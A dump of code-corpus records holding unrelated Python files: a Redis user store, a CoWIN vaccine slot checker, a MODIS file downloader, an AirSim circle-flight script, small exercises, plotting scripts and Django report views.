UserMetadata(self.config, **data_dict)\n\n async def set(self, metadata: UserMetadata) -> None:\n config = self.config\n redis = self.redis\n if self._role != 'admin' and metadata.role:\n raise NotAllowedError('Cannot assign role.')\n user_key = 
config._users_root.end(self.name.encode('utf-8'))\n user_dict = metadata.to_dict(key=token_bytes().hex())\n if self.config.users_json:\n json_data = json.dumps(user_dict)\n await redis.set(user_key, json_data)\n else:\n multi = redis.multi_exec()\n multi.delete(user_key)\n multi.hmset_dict(user_key, user_dict)\n await multi.execute()\n\n async def delete(self) -> None:\n config = self.config\n user_key = config._users_root.end(self.name.encode('utf-8'))\n if not await self.redis.delete(user_key):\n raise UserNotFound(self.name)\n","sub_path":"pymap/backend/redis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"453020652","text":"\n#Import required library\nimport requests\nfrom datetime import datetime, timedelta\n#import pandas as pd\n\n\n# 14 Days Date\ntoday = datetime.today()\nlist_format = [today + timedelta(days=i) for i in range(14)]\ndates_wk = [i.strftime(\"%d-%m-%Y\") for i in list_format]\n\ndates='30-05-2021'\n\n#Search For\npincode=110092\n\n#URL\nalldist_url = \"https://cdn-api.co-vin.in/api/v2/admin/location/districts/9\"\nbydist_url = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict?district_id=9&date=28-05-2021\"\n\nbypin_url = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode={}&date={}\".format(pincode, dates)\n\nheader = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0'} \nresult = requests.get(bypin_url, headers=header)\n\n\n\ncounter=0\n\nif result.ok:\n response_json = result.json()\n if response_json[\"centers\"]: \n for center in response_json[\"centers\"]:\n for session in center[\"sessions\"]:\n if (session[\"available_capacity\"] > -1 ) : \n print('Pincode: ', center[\"pincode\"])\n print('\\t state_name: ', center[\"state_name\"])\n print('\\t district_name: ', center[\"district_name\"]) \n print(\"\\t Available on:\", session[\"date\"])\n print(\"\\t Age: \", session[\"min_age_limit\"])\n print(\"\\t\", center[\"name\"])\n print(\"\\t\", center[\"block_name\"])\n print(\"\\t Price: \", center[\"fee_type\"])\n print(\"\\t Availablity : \", session[\"available_capacity\"])\n print(\"\\t Dose1 : \", session[\"available_capacity_dose1\"], \", Dose2 : \", session[\"available_capacity_dose2\"])\n # print(\"\\t Dose2 : \", session[\"available_capacity_dose2\"])\n if(session[\"vaccine\"] != ''):\n print(\"\\t Vaccine type: \", session[\"vaccine\"])\n print(\"\\n\")\n counter = counter + 1\nelse:\n print(\"No Response!\")\n \n\n","sub_path":"cowin_checker_sk.py","file_name":"cowin_checker_sk.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"357539285","text":"# Based on python2\n\nimport urllib.request as urllib\nimport os\n\n# Example file path : \n# http://222.236.46.45/nfsdb/MODISA/2011/09/01/L2/MYDOCBOX.2011.0901.0413.aqua-1.hdf.zip\n# http://222.236.46.45/nfsdb/MODIST/2011/09/01/L2/MODOCBOX.2011.0901.0235.terra-1.hdf.zip\n# http://222.236.46.45/nfsdb/MODISA/2015/07/11/L2/MYDOCT.2015.0711.0457.aqua-1.hdf.zip\n# http://222.236.46.45/nfsdb/MODIST/2011/09/03/L2/MODOCT.2011.0903.0222.terra-1.hdf.zip\n# http://222.236.46.45/nfsdb/MODISA/2012/01/02/L2/MYDOCT.2012.01.02.0510.aqua-1.hdf.zip\n#full_url = 'http://222.236.46.45/nfsdb/MODISA/2019/01/01/L2/MYDOCT.2019.0101.0000.aqua-1.hdf.zip'\n\nsave_dir_name = 
'../../downloads/'\nif not os.path.exists(save_dir_name):\n os.makedirs(save_dir_name)\n\n\n\nurl1 = 'http://222.236.46.45/nfsdb/MODIST'\nurl2 = 'terra-1.hdf.zip'\n\nfull_urls = []\n\nfor Yr in range(2012, 2020) :\n for Mo in range(1, 2) :\n for Da in range(1, 32) :\n for Ho in range(0, 24) :\n for Mi in range(0, 60) :\n full_urls.append(\"{0}/{1:04d}/{2:02d}/{3:02d}/L2/MODOCT.{1:04d}.{2:02d}{3:02d}.{4:02d}{5:02d}.{6}\"\\\n .format(url1, Yr, Mo, Da, Ho, Mi, url2))\n \nfor full_url in full_urls : \n filename_el = full_url.split(\"/\")\n filename = filename_el[-1]\n\n if not os.path.exists(filename) :\n try :\n urllib.urlretrieve(full_url, '{0}{1}'.format(save_dir_name, filename))\n print ('Trying {0}'.format(full_url), '{0}{1}\\n'.format(save_dir_name, filename))\n except Exception as e: \n print('error {0} : {1}\\n'.format(e, filename))\n else :\n print ('{0} already exists\\n'.format(filename))\n ","sub_path":"Python_code/kosc_url_crawler_sj_terra.py","file_name":"kosc_url_crawler_sj_terra.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"295929554","text":"from animal import Animal\n\nclass Person(Animal):\n def __init__(self,name,age):\n Animal.__init__(self,age)\n self.set_name(name)\n self.friends=[]\n def get_friends(self):\n return self.friends\n def add_friend(self,fname):\n if fname not in self.friends:\n self.friends.append(fname)\n def speak(self):\n print(\"hello.\")\n def age_diff(self,other):\n diff=self.years-other.years\n print(abs(diff),\"years difference\")\n def __str__(self):\n return \"person:\"+str(self.name)+\":\"+str(self.years)\n\nif __name__==\"__main__\":\n p=Person(\"light\",38)\n print(p)\n p.add_friend('neo')\n p.add_friend('nick')\n print(p.get_friends())\n p.speak()\n q=Person(\"Kasey\",22)\n p.age_diff(q)\n q.age_diff(p)\n print(p.get_age())\n print(p.get_name())\n\n","sub_path":"ses9/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"533396364","text":"#!/usr/bin/python3.6\n# -*- coding: utf-8 -*-\n#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#PORCENTAGEM\n# Volume atual de um reservatório de água (em metros cúbicos)\nreservoir_volume = 4.445e8\nreservoir_volume2 = 4.445 * 10 ** 8\n\n# Total de água da chuva de uma tempestade(em metros cúbicos)\nrainfall = 5e6\nrainfall2 = 5 * 10 ** 6\nrainfall *= .9\n\n# Reduza a variável de água da chuva(rainfall) em 10% para considerar perdas\nperda = (rainfall2 - (rainfall2 * 10 /100))\nreservoir_volume += rainfall\n\n# Adicione a variável rainfall à variaável de vol. 
atual do reservatório(reservoir_volume)\ntotal_reservoir = perda + reservoir_volume2\nreservoir_volume *= 1.05\n\n# aumente o volume do reservatório (reservoir_volume) em 5% para considerar águas tempestuosas\n# que chegam no reservatório dias apoós a tempestade\naumento = (total_reservoir + (total_reservoir * 5 / 100))\nreservoir_volume *= 0.95\n\n# reduza o volume do reservatório (reservoir_volume) em 5% para considerar evaporaçaão \nreducao = (aumento - (aumento * 5 / 100))\nprint(reducao)\nreservoir_volume *= 0.95\n\n# Subtraia 2.5e5 metros cúbicos de reservoir_volume para considerar água\n# que édirecionada para regiões áridas.\nnewvolume = 2.5 * 10 ** 5\nprint(newvolume)\ntotal = reducao - newvolume\nreservoir_volume -= 2.5e5 \n\n# execute um print do novo valor de reservoir_volume\nprint(total)\nprint(reservoir_volume)\n\nteste = 5e6 \nteste = teste * .9\nprint(teste) \n\nrainfall = 5e6\nteste2 = (rainfall -(rainfall * 10 / 100))\nprint(teste2)","sub_path":"aula03_exercicio.py","file_name":"aula03_exercicio.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"65704027","text":"import os\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import DataLoader, Dataset\r\nfrom torchvision import transforms\r\nfrom torchvision.utils import save_image\r\nfrom scipy.stats.stats import pearsonr\r\nfrom Progbar import Progbar\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom model import LinearAutoEncoder # 模型\r\nfrom util import LinearPackDataset, norm, minmax_0_to_1 # 数据\r\nfrom util import OutputManager, save_output_data # 保存文件\r\nfrom util import calculate_pcc_mse, minmax_noisy_data # 计算\r\nfrom util import predict_one_by_one\r\n\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else 'cpu')\r\nnum_epochs = 10\r\nbatch_size = 50\r\nlearning_rate = 1e-3\r\noutput_path = \"./output\"\r\nmodel_name = \"LinearAutoEncoder\"\r\n\r\n\r\ndef predict(output_manager, device, num_epochs=10):\r\n dataset = LinearPackDataset(output_manager.simulated_csv_data_path, output_manager.true_csv_data_path)\r\n dataloader = DataLoader(dataset, batch_size=50, shuffle=True, num_workers=3)\r\n model = LinearAutoEncoder().to(device)\r\n MSE_loss = nn.MSELoss()\r\n BCE_Loss = nn.BCELoss()\r\n criterion = MSE_loss\r\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-3, weight_decay=1e-5)\r\n\r\n # 训练\r\n if os.path.exists(output_manager.model_file_path()):\r\n model.load_state_dict(torch.load(output_manager.model_file_path(), \"cpu\"))\r\n else:\r\n model.train()\r\n for epoch in range(num_epochs):\r\n print('epoch [{}/{}]'.format(epoch + 1, num_epochs))\r\n prog = Progbar(len(dataloader))\r\n for i, data in enumerate(dataloader):\r\n (noisy_data, _) = data\r\n noisy_data = minmax_noisy_data(noisy_data, device)\r\n # ===================forward=====================\r\n output = model(noisy_data)\r\n loss = criterion(output, noisy_data)\r\n pcc, mse = calculate_pcc_mse(output, noisy_data, MSE_loss)\r\n # ===================backward====================\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n # =====================log=======================\r\n prog.update(i + 1, [(\"loss\", loss.item()), (\"MSE\", mse), (\"PCC\", pcc)])\r\n torch.save(model.state_dict(), output_manager.model_file_path())\r\n\r\n # 预测、评价\r\n model.eval()\r\n dataloader2 = DataLoader(dataset, batch_size=2000, shuffle=True, num_workers=3)\r\n 
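# calculate_pcc_mse() used in the training loop above comes from the local
# util module, which is not included in this record. A minimal sketch of what
# it is assumed to compute (an assumption, not the actual implementation),
# reusing the pearsonr import at the top of the file:
#
#     def calculate_pcc_mse_sketch(output, target, mse_loss):
#         a = output.detach().cpu().numpy().ravel()
#         b = target.detach().cpu().numpy().ravel()
#         pcc = pearsonr(a, b)[0]                # Pearson correlation coefficient
#         mse = mse_loss(output, target).item()  # mean squared error
#         return pcc, mse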
for data in dataloader2:\r\n (noisy_data, _) = data\r\n noisy_data = minmax_noisy_data(noisy_data, device)\r\n # ===================forward=====================\r\n output = model(noisy_data)\r\n loss = criterion(output, noisy_data)\r\n # =====================log and save==============\r\n save_output_data(output, noisy_data, MSE_loss, output_manager)\r\n break # 只有一个 batch, 一次全拿出来了,不会有第二个\r\n\r\n\r\ndef predict_with_output_manager(simulated_csv_data_path, true_csv_data_path, model_filename, dropout):\r\n output_manager = OutputManager(simulated_csv_data_path=simulated_csv_data_path,\r\n true_csv_data_path=true_csv_data_path,\r\n model_filename=model_filename,\r\n output_path=output_path,\r\n model_name=model_name,\r\n dropout=dropout)\r\n predict(output_manager=output_manager,\r\n device=device,\r\n num_epochs=num_epochs)\r\n\r\n\r\npredict_one_by_one(predict_with_output_manager)\r\n","sub_path":"train_AE.py","file_name":"train_AE.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"450301154","text":"import numpy as np\n\nimport numba as nb\n\n@nb.njit()\ndef partition(values, idxs, left, right):\n \"\"\"\n Partition method\n \"\"\"\n\n piv = values[idxs[left]]\n i = left + 1\n j = right\n\n while True:\n while i <= j and values[idxs[i]] <= piv:\n i += 1\n while j >= i and values[idxs[j]] >= piv:\n j -= 1\n if j <= i:\n break\n\n idxs[i], idxs[j] = idxs[j], idxs[i]\n\n idxs[left], idxs[j] = idxs[j], idxs[left]\n\n return j\n\n\n@nb.njit()\ndef argsort1D(values):\n\n idxs = np.arange(values.shape[0])\n\n left = 0\n right = values.shape[0] - 1\n\n max_depth = np.int(right / 2)\n\n ndx = 0\n\n tmp = np.zeros((max_depth, 2), dtype=np.int64)\n\n tmp[ndx, 0] = left\n tmp[ndx, 1] = right\n\n ndx = 1\n while ndx > 0:\n\n ndx -= 1\n right = tmp[ndx, 1]\n left = tmp[ndx, 0]\n\n piv = partition(values, idxs, left, right)\n\n if piv - 1 > left:\n tmp[ndx, 0] = left\n tmp[ndx, 1] = piv - 1\n ndx += 1\n\n if piv + 1 < right:\n tmp[ndx, 0] = piv + 1\n tmp[ndx, 1] = right\n ndx += 1\n\n return idxs\n\n\nif __name__ == '__main__':\n x = np.random.random((100000,))\n\n res = np.argsort(x)\n out = argsort1D(x)\n\n assert np.all(res == out)\n print('all ok')\n","sub_path":"scipy_numba/cluster/_argsort.py","file_name":"_argsort.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"194571433","text":"'''\n airsim 四旋翼飞圆形\n'''\nimport airsim\nimport numpy as np\nimport math\nimport time\n\nclient = airsim.MultirotorClient() # connect to the AirSim simulator\nclient.enableApiControl(True) # 获取控制权\nclient.armDisarm(True) # 解锁\nclient.takeoffAsync().join() # 起飞\nclient.moveToZAsync(-3, 1).join() # 第二阶段:上升到2米高度\n\ncenter = np.array([[0], [3]]) # 圆心设置\nspeed = 1 # 速度设置\nradius = 3 # 半径设置\nclock_wise = True # 顺时针或逆时针设置\n\npos_reserve = np.array([[0.], [0.], [-3.]])\n\n\n # 速度控制\nfor i in range(2000):\n # 获取无人机当前位置\n state = client.simGetGroundTruthKinematics()\n pos = np.array([[state.position.x_val], [state.position.y_val], [state.position.z_val]])\n # 计算径向速度的方向向量\n dp = pos[0:2] - center\n #np.linalg.norm求的是二范数,正数\n if np.linalg.norm(dp) - radius > 0.1:\n vel_dir_1 = -dp\n elif np.linalg.norm(dp) - radius < 0.1:\n vel_dir_1 = dp\n # 计算切向速度的方向向量\n theta = math.atan2(dp[1, 0], dp[0, 0])\n if clock_wise:\n theta += math.pi / 2\n else:\n theta -= math.pi / 2\n v_dir_2 = np.array([[math.cos(theta)], [math.sin(theta)]])\n # 
compute the direction vector of the final velocity\n v_dir = 0.12 * vel_dir_1 + v_dir_2\n # compute the final velocity command\n v_cmd = speed * v_dir/np.linalg.norm(v_dir)\n # velocity control\n drivetrain = airsim.DrivetrainType.ForwardOnly\n yaw_mode = airsim.YawMode(False, 90)\n client.moveByVelocityZAsync(v_cmd[0, 0], v_cmd[1, 0], -3, 1, drivetrain=drivetrain, yaw_mode=yaw_mode)\n # plotting\n point_reserve = [airsim.Vector3r(pos_reserve[0, 0], pos_reserve[1, 0], pos_reserve[2, 0])]\n point = [airsim.Vector3r(pos[0, 0], pos[1, 0], pos[2, 0])]\n point_end = pos + np.vstack((v_cmd, np.array([[0]])))\n point_end = [airsim.Vector3r(point_end[0, 0], point_end[1, 0], point_end[2, 0])]\n client.simPlotArrows(point, point_end, arrow_size=8.0, color_rgba=[0.0, 0.0, 1.0, 1.0])\n client.simPlotLineList(point_reserve+point, color_rgba=[1.0, 0.0, 0.0, 1.0], is_persistent=True)\n # prepare the next loop iteration\n pos_reserve = pos\n time.sleep(0.02)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35344474","text":"def is_safe(grid, visited, x, y):\n if grid[x][y]==\"*\" or visited[x][y]:\n return False\n return True\n\ndef is_valid(grid, x, y):\n m, n = len(grid), len(grid[0])\n return x < m and y < n and x >= 0 and y >= 0\n\ndef find_shorted_path(grid, visited, cx, cy, dx, dy, dist, min_dist):\n if cx == dx and cy == dy:\n return min(min_dist, dist)\n visited[cx][cy] = 1\n if is_valid(grid, cx+1,cy) and is_safe(grid, visited, cx+1, cy):\n min_dist = find_shorted_path(grid, visited, cx+1, cy, dx, dy, dist+1, min_dist)\n if is_valid(grid, cx-1,cy) and is_safe(grid, visited, cx-1, cy):\n min_dist = find_shorted_path(grid, visited, cx-1, cy, dx, dy, dist+1, min_dist)\n if is_valid(grid, cx,cy+1) and is_safe(grid, visited, cx, cy+1):\n min_dist = find_shorted_path(grid, visited, cx, cy+1, dx, dy, dist+1, min_dist)\n if is_valid(grid, cx,cy-1) and is_safe(grid, visited, cx, cy-1):\n min_dist = find_shorted_path(grid, visited, cx, cy-1, dx, dy, dist+1, min_dist)\n visited[cx][cy] = 0\n return min_dist\n\n\n\n\n\n\n\nn, m, q = [int(x) for x in input().split()]\ngrid = []\nfor i in range(n):\n grid.append([x for x in input().split()])\nsx, sy = [int(x) for x in input().split()]\nvisited = [[0 for x in range(m)] for y in range(n)]\nfor _ in range(q):\n dx, dy = [int(x) for x in input().split()]\n min_dist = find_shorted_path(grid, visited, sx, sy, dx, dy, 0, int(10e9))\n print(min_dist)\n\n\n\n\n\n\n\n\n","sub_path":"HackerEarth/min_distance.py","file_name":"min_distance.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"610838342","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 1 12:00:40 2017\n\n@author: rimikamajumdar\n\"\"\"\n\n# Exercise 29: What If\n# Introduction to if-statement\n# try putting boolean expressions in the if-statements\n\npeople = 20\ncats = 30\ndogs = 15\n\n\nif (people < cats and 1 == 1):\n print(\"Too many cats! The world is doomed!\")\n\nif (people > cats or False):\n print(\"Not many cats! 
The world is saved!\")\n \nif (people < dogs and 3 != 2):\n print(\"The world is drooled on!\")\n \nif (people > dogs and (100 == 100 or \"Rimika\" == \"kool\")):\n print(\"The world is dry!\")\n \n# increment dogs by 5 \ndogs += 5\n\nif (people >= dogs or (\"Python\" == 100)):\n print(\"People are greater than or equal to dogs.\")\n \nif (people <= dogs and (not (1 != 1 and 10 == 10))):\n print(\"People are less than or equal to dogs.\")\n \nif (people == dogs and (1 == 1 or \"5\" == str(5))):\n print(\"People are dogs.\")\n \n'''\nOutput is the following:\nToo many cats! The world is doomed!\nThe world is dry!\nPeople are greater than or equal to dogs.\nPeople are less than or equal to dogs.\nPeople are dogs.\n'''","sub_path":"ex29.py","file_name":"ex29.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208918071","text":"############################\n## Calvin Yong ##\n## MTH 691 Program 5 ##\n############################\n\nimport pandas as pd\nimport plotly.offline as py\nimport plotly.graph_objs as go\nimport multiprocessing as mp\nfrom itertools import repeat\nimport pathlib\nfrom time import time\nimport projfuncs as pf\nimport projLists\nimport os\n\ndef program5a(fileloc, filetype, quotetype):\n init_tm = time()\n\n # Make dir\n fsplit = fileloc.split('_')\n date = fsplit[len(fsplit) - 1][:-4]\n dirpath = \"program5a_out/\" + filetype + \"/\" + date + \"/\" + quotetype +\"/\"\n pathlib.Path(dirpath).mkdir(parents=True, exist_ok=True)\n\n # Get List of tickers\n pf.get_tickerList(date, filetype)\n\n for ticker in projLists.ticker_list:\n data_starttm = time()\n data = pf.get_tickerData(fileloc, filetype, ticker, \"Q\")\n print(\"Got\", ticker, \"data DF in\", time() - data_starttm, \"Seconds\")\n\n #################\n # Plotting time #\n #################\n\n if(data.empty):\n message = \"There is no \" + quotetype + \" data for \" + ticker + \" at \" + date + \"\\n\"\n print(message)\n with open(\"program5a_\" + filetype + \"_log.txt\", 'a+') as f:\n f.write(message)\n continue\n\n title_date = data.Time[len(data) - 1].strftime('%b %-d, %Y')\n layout = go.Layout(xaxis={'title': 'Time (UTC)', 'type': 'date',\n 'tickformat': '%I:%M:%S %p'},\n yaxis={'title': 'Price'},\n title=ticker + \" | \" + quotetype + \" | \" + title_date,\n showlegend=True)\n \n # Make a trace for each venue\n traces = []\n for venue in data[\"Contributor Id\"].unique():\n trace = go.Scatter(x = data.Time[data[\"Contributor Id\"] == venue], \n y = data[quotetype + \" Price\"][data[\"Contributor Id\"] == venue],\n name = venue)\n traces.append(trace)\n \n # Output html file\n fig = go.Figure(data = traces, layout = layout)\n imgname = ticker + \"_\" + \"quotes_\" + quotetype + \"_\" + filetype \\\n + \"_\" + date\n py.plot(fig, \n filename=dirpath + imgname + \".html\", \n image=\"png\",\n image_filename=imgname,\n image_width=1024,\n image_height=768,\n auto_open=False, \n show_link=False)\n\n print(\"Ticker\", ticker, \"at date\", date, \"done\")\n\n print(date, \"plots finished in\", time() - init_tm, \"seconds\")\n\n\n###################\n## Main Function ##\n###################\n\nif __name__ == \"__main__\":\n filetype = pf.get_validInput(\"Type A or B files: \", 4)\n while True:\n quotetype = input(\"Enter Bid or Ask: \")\n if (quotetype in [\"Bid\", \"Ask\"]):\n break\n print(\"Invalid Input\")\n\n os.chdir(\"/space/mth693/common/phase1_alloutput/\")\n\n program_start_tm = time()\n with 
mp.Pool(mp.cpu_count()) as pool:\n pool.starmap(program5a, \n zip(projLists.file_list, repeat(filetype), repeat(quotetype)))\n \n print(\"Program finished in\", (time() - program_start_tm)/60, \"minutes\")\n print(\"Type\", filetype, \"quotetype\", quotetype, \"files done :D\")\n ","sub_path":"Aux_scripts/program5a_getAll.py","file_name":"program5a_getAll.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"552892017","text":"import KratosMultiphysics\nimport KratosMultiphysics.ALEApplication as KratosALE\n\ndef Factory(settings, Model):\n if(type(settings) != KratosMultiphysics.Parameters):\n raise Exception(\"expected input shall be a Parameters object, encapsulating a json string\")\n return SetInterfaceProcess(Model, settings[\"Parameters\"])\n\nclass SetInterfaceProcess(KratosMultiphysics.Process):\n def __init__(self, Model, settings):\n\n KratosMultiphysics.Process.__init__(self)\n\n default_parameters = KratosMultiphysics.Parameters( \"\"\"\n {\n \"mesh_id\" : 0,\n \"model_part_name\" : \"CHOOSE_FLUID_OR_STRUCTURE_INTERFACE_MODELPART_NAME\",\n \"variable_name\" : \"CHOOSE_BETWEEN_STRUCTURE_INTERFACE_OR_FLUID_INTERFACE\"\n } \"\"\" )\n\n settings.ValidateAndAssignDefaults(default_parameters);\n\n interface_model_part = Model[settings[\"model_part_name\"].GetString()]\n\n if settings[\"variable_name\"].GetString() == \"STRUCTURE_INTERFACE\":\n for node in interface_model_part.Nodes:\n # Set the INTERFACE flag\n node.Set(KratosMultiphysics.INTERFACE, True)\n\n elif settings[\"variable_name\"].GetString() == \"FLUID_INTERFACE\":\n zero_vect = [0,0,0]\n\n for node in interface_model_part.Nodes:\n # Set the INTERFACE flag\n node.Set(KratosMultiphysics.INTERFACE, True)\n # Fix the MESH_DISPLACEMENT and initialize it to zero at the interface\n node.Fix(KratosALE.MESH_DISPLACEMENT_X)\n node.Fix(KratosALE.MESH_DISPLACEMENT_Y)\n node.Fix(KratosALE.MESH_DISPLACEMENT_Z)\n node.SetSolutionStepValue(KratosALE.MESH_DISPLACEMENT,0,zero_vect)\n","sub_path":"kratos/applications/FSIapplication/python_scripts/set_interface_process.py","file_name":"set_interface_process.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"579750594","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 5 15:43:13 2019\n\n@author: George\n\"\"\"\n\nimport pandas as pd\n\n\nfilePath =r\"Y:\\8_NAM (Nucleic-Acid Memory)_Sep2017_InProgress\\11_Super-Resolution\\George_D_DATA\\2020-02-11\\2020-01-31_dNAM_LS_mhPS37_repreat-locs.csv\"\nsavePath = filePath.split('.')[0] + '_fixed.csv'\n\ndf = pd.read_csv(filePath)\n\ncolNames = list(df.columns) \nprint(colNames)\n\ndf.rename(index=str, columns={\"uncertainty [nm]\": \"uncertainty_xy [nm]\"}, inplace=True)\n\ncolNames2 = list(df.columns) \n\n\ndf.to_csv(savePath, index=False)\n\nprint('Done')","sub_path":"BSU/fix_thunderstormCSV_header 2.py","file_name":"fix_thunderstormCSV_header 2.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"482436417","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ezidapp', '0010_storeuser_inheritgroupshoulders'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='downloadqueue',\n name='currentIndex',\n 
field=models.IntegerField(default=0),\n ),\n migrations.AddField(\n model_name='downloadqueue',\n name='toHarvest',\n field=models.TextField(default=''),\n preserve_default=False,\n ),\n ]\n","sub_path":"ezidapp/migrations/0011_downloadqueue_part1.py","file_name":"0011_downloadqueue_part1.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"282041673","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic import View\nfrom useract.functions import validate_inputs\nfrom useract.models import Authority, Inquiry\n\n\nclass getReport(View):\n template = 'reportofauth/reportofauth.html'\n template1='reportsearch/report.html'\n def post(self,request):\n date = request.POST.get('date')\n validity = validate_inputs.validDate(date)\n new_date =''\n if(validity[0]):\n for letter in date:\n if (letter != \"/\"):\n new_date = new_date + letter\n #just put a number change later\n authr = request.session['auth']\n report_id = str(authr) + str(new_date)\n authorityName = Authority.objects.filter(authority_id=int(authr))\n authNameStr = ''\n da = generateReportData(date,int(authr))\n array = da[0]\n for auth in authorityName:\n authNameStr = auth.authority_name\n obj = Inquiry.objects.filter(report_id=report_id)\n array1 = da[2]\n array2 = generateReportData2(date,int(authr))\n return render(request, self.template,{'r':report_id,'obj':obj,'var1':array[0],'var2':array[1],\n 'var3':array[2],'var4':array[3],'var5':array[4],\n 'var6':array[5],'var7':array[6],'var8':array[7],'var9':array[8],\n 'var10':array[9],'var11':array[10],'var12':array[11],\n 'm1': array1[0], 'm2': array1[1],\n 'm3': array1[2], 'm4': array1[3], 'm5': array1[4],\n 'm6': array1[5], 'm7': array1[6], 'm8': array1[7],\n 'm9': array1[8],\n 'm10': array1[9], 'm11': array1[10], 'm12': array1[11],\n 'array':array2[0],'cnt':array2[1],'d1':array2[1][0],'d2':array2[1][1],\n 'd3': array2[1][2],'d4':array2[1][3],'d5':array2[1][4],\n 'd6': array2[1][5],'d7':array2[1][6],\n })\n\n else:\n return render(request, self.template1, {'user': request.session['users'],'msg':\"INVALID\"})\n\n def get(self,request):\n return render(request, self.template1,{'user':request.session['users'],'msg':\"\"})\n\n\nclass getSearchHome(View):\n template = \"reportsearch/report.html\"\n\n def post(self, request):\n return render(request, self.template, )\n\n def get(self, request):\n return render(request, self.template, {'user': request.session['users']})\n\n\ndef generateReportData(date,auth):\n dic= {'1':'Jan','2':'Feb','3':'Mar','4':'Apr','5':'May','6':'Jun','7':'Jul',\n '8':'Aug','9':'Sep','10':'Oct','11':'Nov','12':'Dec'}\n template = \"test/test.html\"\n nameofmonths = []\n num_of_inquiry = []\n authority = auth\n months = []\n day = date[0:2]\n month = int(date[3:5])\n year = int(date[6:])\n for i in range(0,12):\n if(month != 0):\n id=''\n if(len(str(month))==1):\n id = \"0\"+str(month)\n else:\n id = str(month)\n months.append(id+str(year))\n nameofmonths.append(dic[str(month)])\n month = month-1\n\n else:\n month = 12\n id = ''\n if (len(str(month)) == 1):\n id = \"0\" + str(month)\n else:\n id = str(month)\n months.append(id+str(year-1))\n nameofmonths.append(dic[str(month)])\n month = month-1\n year = year-1\n\n\n\n all_inq = Inquiry.objects.all()\n for j in months:\n count= 0\n for inq in all_inq:\n if(str(inq.report_id.report_id)[3:] == j and str(inq.report_id.report_id)[0]==str(authority)):\n count+=1\n\n 
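# Layout of report_id assumed by the slicing above and in generateReportData2
# below (inferred from getReport, which builds it as str(authority) plus the
# date with '/' stripped; this inference is not documented in the source):
# one authority digit followed by DDMMYYYY. Example: authority 1 on
# 05/03/2021 gives "105032021", so report_id[0] is the authority digit and
# report_id[3:] is the MMYYYY month key. The slices only line up for
# single-digit authority ids.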
num_of_inquiry.append(count)\n\n return num_of_inquiry,months,nameofmonths\n\ndef generateReportData2(date,auth):\n dic = {'1': 'Jan', '2': 'Feb', '3': 'Mar', '4': 'Apr', '5': 'May', '6': 'Jun', '7': 'Jul',\n '8': 'Aug', '9': 'Sep', '10': 'Oct', '11': 'Nov', '12': 'Dec'}\n\n dic2 = {'1':31,'2':28,'3':31,'4':30,'5':31,'6':31,'7':31,'8':30,'9':31,'10':31,'11':30,'12':31}\n day = int(date[0:2])\n month = int(date[3:5])\n year = int(date[6:])\n rep_id =[]\n for i in range(0,7):\n id =''\n if(int(day) !=0):\n if(len(str(day)) == 1):\n id = \"0\"+str(day)\n else:\n id = str(day)\n\n if(len(str(month))==1):\n id = id+\"0\"+str(month)\n else:\n id = id+str(month)\n id = str(auth)+id+str(year)\n day =day-1\n rep_id.append(id)\n\n if(day == 0):\n if(month!=1):\n month = month-1\n day = dic2[str(month)]\n\n if (len(str(day)) == 1):\n id = \"0\" + str(day)\n else:\n id = str(day)\n\n if (len(str(month)) == 1):\n\n id = id + \"0\" + str(month)\n else:\n id = id + str(month)\n id = str(auth) + id + str(year)\n rep_id.append(id)\n day = day - 1\n\n 